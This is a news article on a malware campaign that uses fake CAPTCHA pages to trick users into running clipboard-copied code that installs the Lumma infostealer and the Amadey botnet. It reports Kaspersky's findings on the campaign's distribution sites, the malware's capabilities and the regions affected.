Malware Campaign Broadens Tactics with Increased Use of Fake CAPTCHAs

Published:

The Rise of Malware Delivery Through Fake CAPTCHAs: A New Cyber Threat

In the ever-evolving landscape of cybersecurity, researchers have recently uncovered a concerning trend: a new campaign delivering malware through fake CAPTCHA systems. CAPTCHAs, or Completely Automated Public Turing tests to tell Computers and Humans Apart, are commonly used on websites to differentiate between human users and automated bots. However, cybercriminals are now exploiting users’ instinctive desire to quickly bypass these verification tools, leading to a significant increase in malware distribution.

Understanding the Threat

According to researchers at Kaspersky, a prominent Russian cybersecurity firm, this latest campaign primarily targets users through online advertisements, adult websites, file-sharing services, betting platforms, anime sites, and web applications that monetize traffic. The attackers have refined their methods, expanding their distribution network to reach a broader pool of potential victims. This shift indicates a strategic evolution in their operations, moving beyond previous campaigns that primarily targeted gamers through websites hosting cracked games.

The Mechanics of the Attack

The recent campaign, observed from mid-September to October, employs a deceptive tactic: redirecting users to a seemingly normal CAPTCHA interface. When victims click the familiar “I’m not a robot” button, they unwittingly copy malicious code to their clipboard. Completing the verification steps executes this code, leading to the installation of malware known as Lumma and Amadey.

In some instances, the malicious script downloads and executes an archive containing Lumma, an infostealer that has been available through a malware-as-a-service model on Russian-speaking forums since at least August 2022. Once installed, Lumma searches for files associated with cryptocurrency wallets and attempts to steal them. The malware also extracts cookies and other credentials stored in browsers, including sensitive data from password manager archives.

The Aftermath of Infection

Once the malware has exfiltrated valuable data, it takes a further step by visiting various online stores. This behavior appears to be a tactic to generate additional revenue for the attackers by artificially boosting views of these websites, akin to adware. The dual functionality of Lumma—stealing sensitive information and generating traffic—highlights the sophisticated nature of this cyber threat.

The Role of Amadey

While Lumma has been previously associated with fake CAPTCHA attacks, the introduction of Amadey marks a new chapter in this campaign. Amadey is a botnet that first emerged around 2018 and is currently available for purchase on Russian-speaking hacking forums for approximately $500. This botnet enhances the attackers’ capabilities by downloading several modules designed to steal credentials from popular web browsers, detect cryptocurrency wallet addresses in the clipboard, and replace them with addresses controlled by the attackers. Additionally, one module can take screenshots and, in some cases, download the Remcos remote access tool, granting attackers full control over the victim’s device.

Geographic Impact and Unknowns

While the full impact of the fake CAPTCHA campaign remains unclear, Kaspersky has identified Brazil, Spain, Italy, and Russia as some of the most frequently affected regions. The anonymity of the internet complicates the attribution of these attacks, leaving researchers uncertain about which hacker groups are behind this malicious campaign.

Conclusion

As cyber threats continue to evolve, the emergence of malware delivered through fake CAPTCHA systems underscores the importance of vigilance among internet users. Understanding the tactics employed by cybercriminals can help individuals and organizations better protect themselves against these sophisticated attacks. As researchers continue to monitor this trend, it is crucial for users to remain cautious, employ robust security measures, and stay informed about the latest developments in cybersecurity.

For those seeking deeper insights into the world of cyber threats, the Recorded Future Intelligence Cloud offers a wealth of information and resources to help navigate this complex landscape. Learn more here.

Related articles

Recent articles